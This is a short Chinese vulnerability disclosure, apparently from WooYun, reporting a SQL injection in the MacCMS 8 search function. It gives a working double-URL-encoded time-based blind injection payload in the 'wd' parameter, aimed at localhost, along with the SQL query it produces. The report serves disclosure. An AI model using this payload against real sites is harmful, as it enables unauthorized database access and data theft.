### 简要描述:
苹果CMS SQL注入一枚
### 详细说明:
分析参考:
http://wooyun.org/bugs/wooyun-2014-066661
利用参考:
http://wooyun.org/bugs/wooyun-2014-074281
这里就不做代码分析了:
访问url:
http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html
延时5秒即可
抓取sql语句
SELECT count(*) FROM mac_vod WHERE 1=1 AND ( instr(d_name,'xxxx')>0 or sleep(if(1,5,1)))#')>0 or instr(d_starring,'xxxx')>0 or sleep(if(1,5,1)))#')>0 ) AND d_type in (5) and d_type not in(0) and d_usergroup in(0)
### 漏洞证明:
暂无评论